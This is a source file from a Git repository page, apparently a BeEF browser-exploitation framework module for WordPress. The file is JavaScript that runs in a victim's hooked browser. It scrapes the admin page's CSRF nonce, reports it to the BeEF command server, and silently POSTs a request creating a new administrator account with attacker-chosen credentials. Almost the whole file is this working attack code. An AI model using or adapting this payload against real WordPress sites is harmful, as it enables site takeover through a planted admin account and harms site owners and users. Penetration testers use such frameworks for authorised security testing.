Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
99367bb619ca8a028bdc62b3c93c6f21e9e8ce2a
beef/modules/exploits/wordpress_add_admin/command.js
Daniel Reece 99367bb619 added a WP module
2015-08-31 23:49:32 +01:00

74 lines
2.5 KiB
JavaScript
Raw Blame History

//
// Copyright (c) 2015 Daniel Reece - @HBRN8
//
beef.execute(function() {
function g(u){ x=new XMLHttpRequest(); x.open('GET',u,false); x.send(null); return x.responseText; }
function p(u, b){ x=new XMLHttpRequest(); x.open('POST',u,true); x.setRequestHeader("Content-type","application/x-www-form-urlencoded"); x.send(b); return x.responseText; }
/* Kept incase there is a valid reason to use forms over AJAX, I cant think of any.
function post(path, params, method) {
method = method || "post";
var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", path);
for(var key in params) {
if(params.hasOwnProperty(key)) {
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", key);
hiddenField.setAttribute("value", params[key]);
form.appendChild(hiddenField);
}
}
document.body.appendChild(form);
form.submit();
}
*/
var domail = '<%= @domail %>';
page = g("/wp-admin/user-new.php");
m = page.match(/\-user" value="(.*?)" \/><input/);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "CSRF nonce hijacked = " + m[1] +
"\nCreating admin... (<%== format_multiline(@user + ':' + @pass) %>)");
var blob = "action=createuser" +
"&_wpnonce_create-user=" + m[1] +
"&_wp_http_referer=%2Fwp-admin%2Fuser-new.php" +
"&user_login=<%== format_multiline(@user) %>" +
"&email=<%== format_multiline(@email) %>" +
"&first_name=<%== format_multiline(@fname) %>" +
"&last_name=<%== format_multiline(@lname) %>" +
"&url=<%== format_multiline(@url) %>" +
"&pass1=<%== format_multiline(@pass) %>" +
"&pass2=<%== format_multiline(@pass) %>";
if (domail){
//Wordpress will mail regardless of param value if it exists.
blob = blob + "&send_password=1";
}
blob = blob + "&role=administrator&createuser=Add+New+User";
p("/wp-admin/user-new.php", blob);
/* Still cant think of any.
post('/wp-admin/user-new.php',
{action: 'createuser',
'_wpnonce_create-user': m[1],
_wp_http_referer: '%2Fwp-admin%2Fuser-new.php',
user_login: '<%== format_multiline(@user) %>',
email: '<%== format_multiline(@email) %>',
first_name: '<%== format_multiline(@fname) %>',
last_name: '<%== format_multiline(@lname) %>',
url: '<%== format_multiline(@url) %>',
pass1: '<%== format_multiline(@pass) %>',
pass2: '<%== format_multiline(@pass) %>',
send_password: '1',
role: 'administrator',
createuser: 'Add+New+User+'});
*/
});
Reference in New Issue View Git Blame Copy Permalink